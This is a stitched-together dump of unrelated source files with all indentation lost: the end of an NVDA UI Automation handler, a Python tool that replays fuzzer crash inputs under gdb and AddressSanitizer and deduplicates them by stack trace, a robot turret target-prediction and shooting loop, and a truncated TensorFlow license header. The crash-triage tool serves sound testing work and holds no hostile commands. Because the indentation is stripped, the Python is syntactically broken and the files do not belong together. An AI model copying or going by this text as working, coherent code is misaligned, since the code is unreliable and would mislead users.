# Disabling is only useful if we can inject in-process (and use our older code)
and appModule.helperLocalBindingHandle
# Allow the user to explicitly force UIA support for MS Word documents no matter the Office version
and not config.conf['UIA']['useInMSWordWhenAvailable']
):
return False
return bool(res)
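# isUIAWindow caches the (comparatively expensive) _isUIAWindowHelper answer per window handle
# and only re-evaluates an entry once it is older than 0.5 seconds.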
def isUIAWindow(self,hwnd):
now=time.time()
v=self.UIAWindowHandleCache.get(hwnd,None)
if not v or (now-v[1])>0.5:
v=self._isUIAWindowHelper(hwnd),now
self.UIAWindowHandleCache[hwnd]=v
return v[0]
def getNearestWindowHandle(self,UIAElement):
if hasattr(UIAElement,"_nearestWindowHandle"):
# Called previously. Use cached result.
return UIAElement._nearestWindowHandle
try:
processID=UIAElement.cachedProcessID
except COMError:
return None
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
# WDAG (Windows Defender application Guard) UIA elements should be treated as being from a remote machine, and therefore their window handles are completely invalid on this machine.
# Therefore, jump all the way up to the root of the WDAG process and use that window handle as it is local to this machine.
if appModule.appName==WDAG_PROCESS_NAME:
condition=UIAUtils.createUIAMultiPropertyCondition({UIA_ClassNamePropertyId:[u'ApplicationFrameWindow',u'CabinetWClass']})
walker=self.clientObject.createTreeWalker(condition)
else:
# Not WDAG, just walk up to the nearest valid windowHandle
walker=self.windowTreeWalker
try:
new=walker.NormalizeElementBuildCache(UIAElement,self.windowCacheRequest)
except COMError:
return None
try:
window=new.cachedNativeWindowHandle
except COMError:
window=None
# Cache for future use to improve performance.
UIAElement._nearestWindowHandle=window
return window
def isNativeUIAElement(self,UIAElement):
#Due to issues dealing with UIA elements coming from the same process, we do not class these UIA elements as usable.
#It seems to be safe enough to retrieve the cached processID, but using tree walkers or fetching other properties causes a freeze.
try:
processID=UIAElement.cachedProcessId
except COMError:
return False
if processID==windll.kernel32.GetCurrentProcessId():
return False
# Whether this is a native element depends on whether its window natively supports UIA.
windowHandle=self.getNearestWindowHandle(UIAElement)
if windowHandle:
if self.isUIAWindow(windowHandle):
return True
if winUser.getClassName(windowHandle)=="DirectUIHWND" and "IEFRAME.dll" in UIAElement.cachedProviderDescription and UIAElement.currentClassName in ("DownloadBox", "accessiblebutton", "DUIToolbarButton", "PushButton"):
# This is the IE 9 downloads list.
# #3354: UiaHasServerSideProvider returns false for the IE 9 downloads list window,
# so we'd normally use MSAA for this control.
# However, its MSAA implementation is broken (fires invalid events) if UIA is initialised,
# whereas its UIA implementation works correctly.
# Therefore, we must use UIA here.
return True
return False
|
crashminimizer.py
|
#!/usr/bin/env python3
# Author: Casper
# Email: slei.casper@gmail.com
import re
import sys
import time
import argparse
import os
import random
import psutil
import pty
import multiprocessing
DEBUG = True
STACKTRACELEVEL = 3
report_fd = None
def print_red(aMsg):
global report_fd
if report_fd:
report_fd.write(aMsg.encode('latin-1') + b'\n')
print("\033[31m%s\033[0m"%aMsg)
def print_green(aMsg):
global report_fd
if report_fd:
report_fd.write(aMsg.encode('latin-1') + b'\n')
print("\033[32m%s\033[0m"%aMsg)
def print_yellow(aMsg, aEnd = '\n'):
global report_fd
if report_fd:
report_fd.write(aMsg.encode('latin-1') + b'\n')
print("\033[33m%s\033[0m"%(aMsg), end = aEnd, flush=True)
def print_plain(aMsg):
global report_fd
if report_fd:
report_fd.write(aMsg.encode('latin-1') + b'\n')
print(aMsg)
def loginfo(aMsg):
print_green(aMsg)
def logwarn(aMsg):
print_yellow(aMsg)
def logerror(aMsg):
print_red(aMsg)
exit(1)
def genrandomname(aLen = 10):
res = ''
for i in range(aLen):
res += random.choice('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')
return res
gdbscripttemplate = '''
import gdb
inf = gdb.inferiors()[0]
gdb.execute("set confirm off")
gdb.execute("set pagination off")
gdb.execute("set logging file /tmp/TEMPFILENAMEcrashanalysis.txt")
gdb.execute("set logging overwrite on")
gdb.execute("set logging on")
gdb.execute("set follow-fork-mode parent")
gdb.execute("set logging redirect on")
gdb.execute("file TARGETBINARYPATH")
gdb.execute("r PROGRAMARGUMENTS 2>/dev/null 1>/dev/null")
gdb.execute("set logging file /tmp/TEMPFILENAMEcrashanalysis.txt")
gdb.execute("set logging on")
gdb.execute("set logging redirect on")
if inf.threads() != ():
print("----------------------------------------------------------------------")
gdb.execute("bt 100")
print("----------------------------------------------------------------------")
gdb.execute("i proc mappings")
print("----------------------------------------------------------------------")
stacktracefd = open("/tmp/TEMPFILENAMEstacktrace.txt", "wb")
tframe = gdb.newest_frame()
tidx = 0
while tframe != None:
taddr = tframe.pc()
tname = str(tframe.name())
stacktracefd.write("{0:d}:::::0x{1:x}:::::{2:s}\\n".format(tidx, taddr, tname).encode('ascii'))
tframe = tframe.older()
tidx += 1
stacktracefd.close()
gdb.execute("q")
'''
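# The TARGETBINARYPATH, PROGRAMARGUMENTS and TEMPFILENAME placeholders in the template above are
# substituted per run in runpoconce() before the script is passed to gdb via "gdb -nx -x <script>".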
split_label = '----------------------------------------------------------------------\n'
bt_pn = re.compile(r'#([0-9a-f]+)\s*(0x[0-9a-f]+)?\s*(in)?\s*([\w_]+)\s*')
segvaddr_pn = re.compile(r'SEGV on unknown address (0x[0-9a-f]+)')
stopreason_pn = re.compile(r'Program received signal (.*),')
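# bt_pn is meant to match gdb backtrace lines such as
#   "#3  0x00007ffff7a42428 in __GI_raise (sig=6) at raise.c:54"
# (the sample line is illustrative, not taken from a real report).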
blackkeywordlist = [
'sanitizer',
'asan',
'__GI_abort',
'__GI_raise',
'~ScopedInErrorReport',
'ReportGenericError',
'__assert_fail_base',
'__GI___assert_fail'
]
class CrashMinimizer():
def __init__(self, aReportDir):
global report_fd
if aReportDir:
if os.path.exists(aReportDir):
logerror("found crash report directory: %s, delete it if you want to continue"%aReportDir)
os.mkdir(aReportDir)
self.reportdir = aReportDir
report_fd.close()
os.unlink('report.txt')
report_fd = open("%s/report.txt"%self.reportdir, "wb")
else:
self.reportdir = None
self.alluniqstacktraces = {
'normal': [],
'SEGV': [],
'heap-buffer-overflow': [],
'stack-overflow': [],
'stack-underflow': [],
'stack-buffer-overflow': [],
'heap-use-after-free': [],
'global-buffer-overflow': [],
'stack-use-after-return': [],
'stack-use-after-scope': [],
'initialization-order-fiasco': [],
'negative-size-param': [],
'big-malloc-size': [],
'memcpy-param-overlap': [],
'oom': [],
'FPE': [],
'invalidfree': [],
'use-after-poison': [],
'double-free': [],
'unknown-crash': [],
}
self.timeoutlist = []
self.abnormallist = []
self.uniqnum = 0
def cleanuptmpfiles(self, aTempName):
if os.path.exists(f"/tmp/{aTempName}gdbscript.py"):
os.unlink(f"/tmp/{aTempName}gdbscript.py")
if os.path.exists(f"/tmp/{aTempName}stdout.txt"):
os.unlink(f"/tmp/{aTempName}stdout.txt")
if os.path.exists(f"/tmp/{aTempName}stderr.txt"):
os.unlink(f"/tmp/{aTempName}stderr.txt")
if os.path.exists(f"/tmp/{aTempName}gdbstdout.txt"):
os.unlink(f"/tmp/{aTempName}gdbstdout.txt")
if os.path.exists(f"/tmp/{aTempName}gdbstderr.txt"):
os.unlink(f"/tmp/{aTempName}gdbstderr.txt")
if os.path.exists(f"/tmp/{aTempName}crashanalysis.txt"):
os.unlink(f"/tmp/{aTempName}crashanalysis.txt")
if os.path.exists(f"/tmp/{aTempName}stacktrace.txt"):
os.unlink(f"/tmp/{aTempName}stacktrace.txt")
def runpoconce(self, aTargetBinPath, aFuzzArgs, aPocPath, aTestCasePath, aSlaveTTY=None):
'''
This function is multi-process safe; it can be run from several processes at once.
Returns a dict describing the result: a stack trace on a crash, or a timeout/abnormal marker.
'''
aPocPath = aPocPath.replace('(', '\\(').replace(')', '\\)')
tempname = genrandomname()
newargs = []
isstdin = True
for iarg in aFuzzArgs:
if '@@' in iarg:
isstdin = False
if aTestCasePath == None:
newargs.append(iarg.replace('@@', "%s"%aPocPath))
else:
newargs.append(iarg.replace('@@', "%s"%aTestCasePath))
else:
newargs.append(iarg)
if aTestCasePath:
with open(aPocPath, 'rb') as f:
crashdata = f.read()
with open(aTestCasePath, 'wb') as f:
f.write(crashdata)
tpid = os.fork()
istimeout = False
if tpid == 0:
os.environ['ASAN_OPTIONS'] = 'abort_on_error=1:detect_leaks=0'
tnewstdout = os.open(f'/tmp/{tempname}stdout.txt', os.O_RDWR|os.O_CREAT)
if tnewstdout < 0:
raise Exception("open failed")
tnewstderr = os.open(f'/tmp/{tempname}stderr.txt', os.O_RDWR|os.O_CREAT)
if tnewstderr < 0:
raise Exception("open failed")
if isstdin:
tnewstdin = os.open(aPocPath, os.O_RDONLY)
if tnewstdin < 0:
raise Exception("open failed")
os.dup2(tnewstdin, 0)
os.dup2(tnewstdout, 1)
os.dup2(tnewstderr, 2)
os.execvp(aTargetBinPath, [aTargetBinPath] + newargs)
elif tpid > 0:
tacc = 0
while True:
time.sleep(0.2)
(retpid, retstatus) = os.waitpid(tpid, os.WNOHANG)
if retpid == 0:
time.sleep(1)
tacc += 1
if tacc == 10:
os.system("rkill %d 2>&1 1>/dev/null"%tpid)
(retpid, retstatus) = os.waitpid(tpid, 0)
assert(retpid == tpid)
istimeout = True
else:
break
else:
raise Exception("fork error")
if istimeout == True:
logwarn("timeout when testing poc, sig = %d"%os.WTERMSIG(retstatus));
self.cleanuptmpfiles(tempname)
return {
'result': 'timeout',
'pocpath': aPocPath,
}
progstderrcont = open(f"/tmp/{tempname}stderr.txt", "rb").read().decode('latin-1')
progstdoutcont = open(f"/tmp/{tempname}stdout.txt", "rb").read().decode('latin-1')
gdbscript = gdbscripttemplate.replace("TARGETBINARYPATH", aTargetBinPath)
if isstdin:
newargs.append("<")
newargs.append(aPocPath)
gdbscript = gdbscript.replace("PROGRAMARGUMENTS", ' '.join(newargs))
gdbscript = gdbscript.replace("TEMPFILENAME", tempname)
open(f"/tmp/{tempname}gdbscript.py", "wb").write(gdbscript.encode('latin-1'))
tpid = os.fork()
if tpid == 0:
os.environ['ASAN_OPTIONS'] = 'abort_on_error=1:detect_leaks=0'
tnewstdout = os.open(f'/tmp/{tempname}gdbstdout.txt', os.O_RDWR|os.O_CREAT)
if tnewstdout < 0:
raise Exception("open failed")
tnewstderr = os.open(f'/tmp/{tempname}gdbstderr.txt', os.O_RDWR|os.O_CREAT)
if tnewstderr < 0:
raise Exception("open failed")
os.dup2(tnewstdout, 1)
os.dup2(tnewstderr, 2)
if aSlaveTTY:
args = ["gdb", "--tty=%s"%(os.ttyname(aSlaveTTY)), "-nx", "-x", f"/tmp/{tempname}gdbscript.py"]
else:
args = ["gdb", "-nx", "-x", f"/tmp/{tempname}gdbscript.py"]
os.execvp("gdb", args)
elif tpid > 0:
tacc = 0
while True:
time.sleep(0.5)
(retpid, retstatus) = os.waitpid(tpid, os.WNOHANG)
if retpid == 0:
time.sleep(1)
tacc += 1
if tacc == 10:
os.system("rkill %d 2>&1 1>/dev/null"%tpid)
(retpid, retstatus) = os.waitpid(tpid, 0)
assert(retpid == tpid)
break
else:
break
else:
raise Exception("fork error")
if os.WIFEXITED(retstatus) and os.WEXITSTATUS(retstatus) != 0:
logerror("debug me")
if os.WIFSIGNALED(retstatus):
logwarn("timeout when testing poc, sig = %d"%os.WTERMSIG(retstatus));
self.cleanuptmpfiles(tempname)
return {
'result': 'timeout',
'pocpath': aPocPath,
}
gdbstdout = open(f"/tmp/{tempname}gdbstdout.txt", "rb").read().decode('latin-1')
gdbstderr = open(f"/tmp/{tempname}gdbstderr.txt", "rb").read().decode('latin-1')
gdblog_text = open(f"/tmp/{tempname}crashanalysis.txt", "rb").read().decode('latin-1')
stacktracelog = open(f"/tmp/{tempname}stacktrace.txt", "rb").read().decode('latin-1')
gdblog = gdblog_text.split(split_label)[1:-1]
if len(gdblog) == 0:
self.cleanuptmpfiles(tempname)
return {
'result': 'abnormal',
'pocpath': aPocPath,
}
backtrace = gdblog[0].strip()
vmmap = gdblog[1].strip()
vmmap = vmmap.split('\n')
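        # The second gdb log section is the memory map; keep only the rows after the
        # 'Start Addr' header so each mapped file's address range can be recovered below.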
allmaps = []
startfound = False
for mapline in vmmap:
if startfound:
allmaps.append(mapline.strip())
else:
if 'Start Addr' in mapline:
startfound = True
alllibs = {}
for mapline in allmaps:
if len(mapline.split()) != 5:
continue
startaddr = int(mapline.split()[0], 16)
endaddr = int(mapline.split()[1], 16)
libname = mapline.split()[-1]
if libname not in alllibs:
alllibs[libname] = {'startaddr':startaddr, 'endaddr':endaddr}
else:
if alllibs[libname]['endaddr'] < endaddr:
alllibs[libname]['endaddr'] = endaddr
if alllibs[libname]['startaddr'] > startaddr:
alllibs[libname]['startaddr'] = startaddr
tcurrtrace = {
'result': 'crash',
'funcnames': [],
'idxs': [],
'addrs': [],
'offs': [],
'libs': [],
'filenames': [],
'pocfilename': aPocPath,
'stopreason': '',
'vultype': None,
'progstdoutcont': progstdoutcont,
'progstderrcont': progstderrcont,
'gdbstdout': gdbstdout,
'gdbstderr': gdbstderr,
'gdblog_text': gdblog_text,
'pocpath': aPocPath,
}
top100stackframes = stacktracelog.split('\n')[:100]
for ibtline in top100stackframes:
ibtline = ibtline.strip()
if len(ibtline) == 0:
continue
            (tidx, taddr, tname) = ibtline.split(':::::', 2)
tidx = int(tidx)
taddr = int(taddr, 16)
contflag = False
for bword in blackkeywordlist:
if bword in tname:
contflag = True
break
if contflag:
continue
            libname = ''
            imageoff = taddr  # fall back to the absolute address when no mapping matches
            for ilibname in alllibs:
                tlib = alllibs[ilibname]
                if tlib['startaddr'] <= taddr < tlib['endaddr']:
                    libname = ilibname
                    imageoff = taddr - tlib['startaddr']
                    break
            if libname == '':
                logwarn("could not find lib of address 0x%x" % taddr)
tfilename = ''
for tline in backtrace.split('\n'):
tbtpnres = bt_pn.findall(tline)
if len(tbtpnres) == 0:
continue
if int(tbtpnres[0][0]) == tidx:
if ' at ' in tline:
tfilename = tline[tline.find(' at ') + 4:]
break
tcurrtrace['funcnames'].append(tname)
tcurrtrace['offs'].append(imageoff)
tcurrtrace['libs'].append(libname)
tcurrtrace['idxs'].append(tidx)
tcurrtrace['addrs'].append(taddr)
tcurrtrace['filenames'].append(tfilename)
tcurrtrace['type'] = 'none'
if tname in ['main', '__libc_start_main', '_start']:
break
self.cleanuptmpfiles(tempname)
return tcurrtrace
def checkunique(self, aStackTraceObj, aCallbackFunc = None):
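        # Deduplication strategy: bucket each crash by its (Address)Sanitizer report type,
        # then treat two crashes as duplicates when their top STACKTRACELEVEL frames match,
        # comparing source file names when available and falling back to raw addresses.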
global STACKTRACELEVEL
if aStackTraceObj['result'] == 'timeout':
if aStackTraceObj['pocpath'] not in self.timeoutlist:
self.timeoutlist.append(aStackTraceObj['pocpath'])
return
if aStackTraceObj['result'] == 'abnormal':
if aStackTraceObj['pocpath'] not in self.abnormallist:
self.abnormallist.append(aStackTraceObj['pocpath'])
return
find_in_one_of_these = False
if 'AddressSanitizer' in aStackTraceObj['progstderrcont']:
if 'heap-buffer-overflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['heap-buffer-overflow']
aStackTraceObj['vultype'] = 'heap-buffer-overflow'
elif 'stack-overflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-overflow']
aStackTraceObj['vultype'] = 'stack-overflow'
elif 'stack-buffer-underflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-underflow']
aStackTraceObj['vultype'] = 'stack-buffer-underflow'
elif 'stack-buffer-overflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-buffer-overflow']
aStackTraceObj['vultype'] = 'stack-buffer-overflow'
elif 'heap-use-after-free' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['heap-use-after-free']
aStackTraceObj['vultype'] = 'heap-use-after-free'
elif 'global-buffer-overflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['global-buffer-overflow']
aStackTraceObj['vultype'] = 'global-buffer-overflow'
elif 'stack-use-after-return' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-use-after-return']
aStackTraceObj['vultype'] = 'stack-use-after-return'
elif 'stack-use-after-scope' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-use-after-scope']
aStackTraceObj['vultype'] = 'stack-use-after-scope'
elif 'initialization-order-fiasco' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['initialization-order-fiasco']
aStackTraceObj['vultype'] = 'initialization-order-fiasco'
elif 'negative-size-param' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['negative-size-param']
aStackTraceObj['vultype'] = 'negative-size-param'
elif ('AddressSanitizer: requested allocation size' in aStackTraceObj['progstderrcont']
or 'AddressSanitizer failed to allocate' in aStackTraceObj['progstderrcont']):
tuniqstacktraces = self.alluniqstacktraces['big-malloc-size']
aStackTraceObj['vultype'] = 'big-malloc-size'
elif 'memcpy-param-overlap' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['memcpy-param-overlap']
aStackTraceObj['vultype'] = 'memcpy-param-overlap'
elif 'allocator is out of memory' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['oom']
aStackTraceObj['vultype'] = 'oom'
elif 'FPE' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['FPE']
aStackTraceObj['vultype'] = 'FPE'
elif 'attempting free on address which was not malloc' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['invalidfree']
aStackTraceObj['vultype'] = 'invalidfree'
elif 'use-after-poison' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['use-after-poison']
aStackTraceObj['vultype'] = 'use-after-poison'
elif 'double-free' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['double-free']
aStackTraceObj['vultype'] = 'double-free'
elif 'unknown-crash' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['unknown-crash']
aStackTraceObj['vultype'] = 'unknown-crash'
elif 'SEGV' in aStackTraceObj['progstderrcont']:
aStackTraceObj['vultype'] = 'SEGV'
tuniqstacktraces = self.alluniqstacktraces['SEGV']
tres = segvaddr_pn.findall(aStackTraceObj['progstderrcont'])
if len(tres) > 0:
tres = tres[0]
if int(tres, 16) == 0:
aStackTraceObj['stopreason'] = 'null pointer dereference'
else:
aStackTraceObj['stopreason'] = 'crashed on address ' + tres
else:
logerror("unknown address sanitizer type, pls update !!! \n" + aStackTraceObj['progstderrcont'])
else:
if len(stopreason_pn.findall(aStackTraceObj['gdbstdout'])) != 0:
aStackTraceObj['stopreason'] = stopreason_pn.findall(aStackTraceObj['gdbstdout'])[0]
aStackTraceObj['vultype'] = 'normal'
tuniqstacktraces = self.alluniqstacktraces['normal']
aStackTraceObj['vulclass'] = tuniqstacktraces
for oldtrace in aStackTraceObj['vulclass']:
allequalflag = True
for idx in range(min(STACKTRACELEVEL, min(len(oldtrace['offs']), len(aStackTraceObj['offs'])))):
if aStackTraceObj['filenames'][idx] == "" and oldtrace['filenames'][idx] == "":
if aStackTraceObj['addrs'][idx] == oldtrace['addrs'][idx]:
continue
elif aStackTraceObj['filenames'][idx] == oldtrace['filenames'][idx]:
continue
allequalflag = False
break
if allequalflag == True:
find_in_one_of_these = True
break
if find_in_one_of_these == False:
loginfo("[+] found uniq backtrace %s"%aStackTraceObj['pocpath'])
aStackTraceObj['vulclass'].append(aStackTraceObj)
if aCallbackFunc:
aCallbackFunc(aStackTraceObj)
self.uniqnum += 1
def printresult(self, aTotalCrashCount):
loginfo("[+] all uniq crashes:")
loginfo("%-30s%-40s%s"%("[vul type]", "[stop reason]", "[crash file name]"))
count = 0
for ivultypename in self.alluniqstacktraces:
iuniqstacktraces = self.alluniqstacktraces[ivultypename]
for iuniqstacktrace in iuniqstacktraces:
tstopreason = iuniqstacktrace['stopreason']
if self.reportdir:
uniqdirname = "%s/%d"%(self.reportdir, count)
os.mkdir(uniqdirname)
with open("%s/gdblog.txt"%uniqdirname, "wb") as ff:
ff.write(iuniqstacktrace['gdblog_text'].encode('latin-1'))
with open("%s/stdout.txt"%uniqdirname, "wb") as ff:
ff.write(iuniqstacktrace['progstdoutcont'].encode('latin-1'))
with open("%s/stderr.txt"%uniqdirname, "wb") as ff:
ff.write(iuniqstacktrace['progstderrcont'].encode('latin-1'))
pocbytes = open(iuniqstacktrace['pocpath'], 'rb').read()
with open("%s/%s"%(uniqdirname, os.path.basename(iuniqstacktrace['pocpath'])), "wb") as ff:
ff.write(pocbytes)
print_red("%-30s%-40s%s"%(
ivultypename,
tstopreason,
iuniqstacktrace['pocfilename']))
for i in range(len(iuniqstacktrace['funcnames'])):
shortnameres = []
tlen = 0
for iword in iuniqstacktrace['filenames'][i].split('/')[::-1]:
tlen += len(iword)
shortnameres.append(iword)
if tlen > 100:
break
shortnameres = '/'.join(shortnameres[::-1])
if len(shortnameres) > 50:
shortnameres = shortnameres[-50:]
print_plain("\t%-5d0x%016x %-30s %s"%(
iuniqstacktrace['idxs'][i],
iuniqstacktrace['addrs'][i],
iuniqstacktrace['funcnames'][i],
shortnameres,
))
count += 1
for iname in self.timeoutlist:
logwarn("[+] timeout: %s"%iname)
for iname in self.abnormallist:
logwarn("[+] abnormal: %s"%iname)
loginfo("[+] total crash count = %d"%(aTotalCrashCount))
loginfo("[+] total uniq crash count = %d"%self.uniqnum)
if self.reportdir:
loginfo("[+] report is saved to %s"%self.reportdir)
else:
loginfo("[+] report is saved to report.txt")
def main():
global report_fd, STACKTRACELEVEL
report_fd = open("report.txt", "wb")
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--crashdir", required = True, help = "crash directory")
parser.add_argument("-w", "--writepath", help = "test case writing path")
parser.add_argument("-s", "--suffix", help = "test case suffix")
parser.add_argument("-d", "--comparisondepth", type = int, default = 3, help = "comparison stack depth")
parser.add_argument('rest', nargs=argparse.REMAINDER, help = "tested program arguments")
parsed_args = parser.parse_args()
crashdir = parsed_args.crashdir
STACKTRACELEVEL = parsed_args.comparisondepth
if crashdir[-1] != '/':
crashdir += '/'
testcasewritepath = parsed_args.writepath
suffix = parsed_args.suffix
targetbinpath = parsed_args.rest[0]
fuzzargs = parsed_args.rest[1:]
if not os.path.exists(targetbinpath):
logerror("couldn't find target binary")
if testcasewritepath and suffix:
logerror("you can only set 'testwritepath' or 'suffix'")
progname = os.path.basename(targetbinpath)
assert(len(progname) != 0)
minimizer = CrashMinimizer("%s_crashreport"%progname)
crashfiles = os.listdir(crashdir)
crashfiles = [x for x in crashfiles if x not in ['README.txt']]
crashfiles.sort()
print_green("starting minimize %d crashes"%len(crashfiles))
    if testcasewritepath is None:
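        # Scale the worker count with the currently idle CPU fraction (2 workers per idle core,
        # at least 3), so triage parallelism adapts to other load on the machine.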
pcount = int(multiprocessing.cpu_count() * (1 - psutil.cpu_percent()*0.01) * 2)
if pcount < 3:
pcount = 3
else:
pcount = 1
allcrashresults = multiprocessing.Manager().list()
processidx = multiprocessing.Value('i', 0)
lock = multiprocessing.Lock()
def subproc(aFileNames, aTargetBinPath, aFuzzargs, aLock, aTestCasePath):
(master, slave) = pty.openpty()
for ifilename in aFileNames:
crashpath = crashdir + ifilename
            tcurrtrace = minimizer.runpoconce(aTargetBinPath, aFuzzargs, crashpath, aTestCasePath, slave)
with aLock:
processidx.value += 1
print_yellow("[+] [%d/%d] checking poc: %s"%(processidx.value, len(crashfiles), ifilename), '\r')
with aLock:
allcrashresults.append(tcurrtrace)
allsubs = []
eachassignmentcount = len(crashfiles) // pcount
if eachassignmentcount == 0:
eachassignmentcount = 1
if suffix:
alltempfiles = []
testcaseprefix = '/tmp/%s'%(genrandomname())
logwarn("using test case prefix %s"%testcaseprefix)
for i in range(0, len(crashfiles) + eachassignmentcount, eachassignmentcount):
arr = crashfiles[i: i + eachassignmentcount]
if len(arr) == 0:
continue
time.sleep(random.random() * 0.05)
if suffix:
testcasewritepath = '%s%d%s'%(testcaseprefix, i, suffix)
alltempfiles.append(testcasewritepath)
p = multiprocessing.Process(target=subproc, args=(arr, targetbinpath, fuzzargs, lock, testcasewritepath))
p.start()
allsubs.append(p)
for p in allsubs:
p.join()
if suffix:
for ipath in alltempfiles:
os.unlink(ipath)
allcrashresults = list(allcrashresults)
for ires in allcrashresults:
minimizer.checkunique(ires)
minimizer.printresult(len(crashfiles))
report_fd.close()
if __name__ == '__main__':
main()
|
predict2.py
|
import time
import math
import threading
from collections import namedtuple
import cv2
import numpy as np
from scipy.stats import linregress
from camera import Camera
from detect_image import RFBNetDetector
from uart import Uart
class Memory():
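    """Fixed-size ring buffer of floats; getAll() returns the stored samples oldest-first."""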
def __init__(self, max_size=3):
self.max_size = max_size
self.size = 0
self.memory = np.zeros(self.max_size)
self.full = False
def put(self, x):
self.memory[self.size] = x
self.size += 1
if self.size >= self.max_size:
self.size = 0
self.full = True
def getAll(self):
zero_to_now = self.memory[:self.size]
older = self.memory[self.size:]
return np.concatenate([older, zero_to_now], axis=0)
def clean(self):
self.size = 0
self.full = False
class Predictor():
def __init__(self, window=3):
self.slope = None
self.intercept = None
def fit(self, time, angle):
# self.p = np.polyfit(time, angle, w=self.weight, deg=2)
        self.slope, self.intercept, _, _, _ = linregress(time, angle)
def predict(self, time):
if self.slope is None:
return None
k = self.slope
b = self.intercept
return k * time + b
def clean(self):
self.slope = None
self.intercept = None
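# Illustrative use of Predictor (hypothetical numbers): fit angle(t) ~ k*t + b on recent
# samples, then extrapolate a short time ahead, e.g.
#   p = Predictor(); p.fit([0.0, 0.1, 0.2], [2.0, 1.5, 1.0]); p.predict(0.3)  # -> ~0.5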
uart = Uart()
predictor = Predictor()
distance = 300
pitch = 0
yaw = 0
def predict_shoot():
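    """Background loop: extrapolate the yaw error ~0.4 s ahead and request a shot
    (at most two in a row) while the predicted error stays within 1.5 degrees."""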
global uart, predictor, distance, pitch, yaw
shoot_available = 2
while True:
next_angle = predictor.predict(time.time()+0.4)
if next_angle is None:
time.sleep(0.001)
continue
if uart.predict:
# print("Next angle: {}".format(next_angle))
if abs(next_angle) < 1.5:
if shoot_available > 0:
print("Shoot !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
uart.sendTarget(-0.4, pitch, distance)
shoot_available -= 1
else:
shoot_available = 2
time.sleep(0.001)
t = threading.Thread(target=predict_shoot)
#t.setDaemon(True)
t.start()
def run():
global uart, predictor, distance, pitch, yaw
detector = RFBNetDetector()
camera = Camera()
angles = Memory()
timestamp = Memory()
enemy_color = uart.enemy_color
while enemy_color is None:
print("Wait for color...")
enemy_color = uart.enemy_color
time.sleep(0.0333)
src = camera.src
while src is None:
print("Wait for camera...")
src = camera.src
time.sleep(0.01)
armor_box = None
last_armor_box = None
uart_angle = None
while True:
begin = time.time()
        uart_angle = uart.angle
enemy_color = uart.enemy_color
src = camera.src.copy()
boxes = detector.detect(src)
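        # Keep only detections of the enemy color; index 2 is assumed to be the red-armor
        # class and index 1 the blue-armor class in the detector output.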
boxes = np.array(boxes[[1,2][enemy_color=="red"]][0])
#print(boxes)
if boxes.size == 0:
armor_box = None
last_armor_box = None
else:
confidence = boxes[:,-1]
max_arg = np.argmax(confidence)
armor_box = boxes[max_arg,:4]
if boxes.size >= 2 and last_armor_box is not None:
confidence[max_arg] = np.min(confidence)
max_arg = np.argmax(confidence)
sec_armor_box = boxes[max_arg,:4]
if abs(armor_box[0]-last_armor_box[0]) > last_armor_box[2]*0.5 or abs(armor_box[1]-last_armor_box[1]) > last_armor_box[3]*0.5:
if abs(sec_armor_box[0]-last_armor_box[0]) < last_armor_box[2]*0.5 and abs(sec_armor_box[1]-last_armor_box[1]) < last_armor_box[3]*0.5:
armor_box = sec_armor_box
last_armor_box = armor_box
if armor_box is None:
angles.clean()
timestamp.clean()
predictor.clean()
cv2.imshow("src", src)
cv2.waitKey(1)
continue
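        # Convert the box into control targets: pitch from the vertical offset to the image
        # centre (assumed 480-pixel-high frame), distance from the apparent armor height via
        # a pinhole model, and yaw from the horizontal angle using an assumed ~652 px focal length.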
pitch = ((armor_box[1]+armor_box[3])/2 - 240) * 0.5
distance = (30 * 400) / (armor_box[3] - armor_box[1])
x_error = math.atan(((armor_box[0] + armor_box[2])/2 - (335+390)/2) / 652) / math.pi * 180
yaw = x_error * 0.58
timestamp.put(begin-0.01)
angles.put(x_error)
if angles.full:
last_angles = angles.getAll()
last_timestamps = timestamp.getAll()
predictor.fit(last_timestamps, last_angles)
print("Last angles: {}".format(last_angles))
x = x_error * 0.58 # + omega * 1.8
else:
x = (x_error) * 0.58 #+ 1.6
z = distance
y = pitch
if not uart.predict:
uart.sendTarget(x, y, z)
else:
uart.sendTarget(0, y, z)
end = time.time()
#print("Box: {}, angle: {}, send: {}".format(armor_box, uart_angle, (x, y, z)))
if True:
x1, y1, x2, y2 = armor_box
x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)
src = cv2.rectangle(src, (x1, y1), (x2, y2),
(0,255,0), 2)
if last_armor_box is not None:
x1, y1, x2, y2 = last_armor_box
x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)
src = cv2.rectangle(src, (x1, y1), (x2, y2),
(255,0,255), 2)
cv2.imshow("src", src)
cv2.waitKey(1)
#print("FPS", 1/(end - begin))
if __name__ == '__main__':
run()
|
variable_scope_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
